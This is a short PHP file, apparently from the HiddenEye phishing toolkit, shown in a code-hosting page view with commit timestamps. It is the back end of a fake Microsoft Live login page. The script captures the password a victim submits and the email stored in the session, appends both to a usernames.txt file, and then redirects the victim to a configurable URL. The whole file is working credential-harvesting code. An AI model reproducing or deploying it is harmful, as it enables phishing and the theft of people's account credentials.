HiddenEye-Legacy/WebPages/live_web/login.php

16 lines
314 B
PHP
Raw Normal View History

<?php
2019-06-22 15:02:54 +08:00
include 'ip.php';
session_start();
$pass = $_POST["passwd"];
$email=$_SESSION["Email"];
2019-06-15 13:59:16 +08:00
file_put_contents("usernames.txt", "[EMAIL]: " . $email . " [PASS]: " . $pass . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();
session_destroy();
2019-06-15 13:59:16 +08:00
?>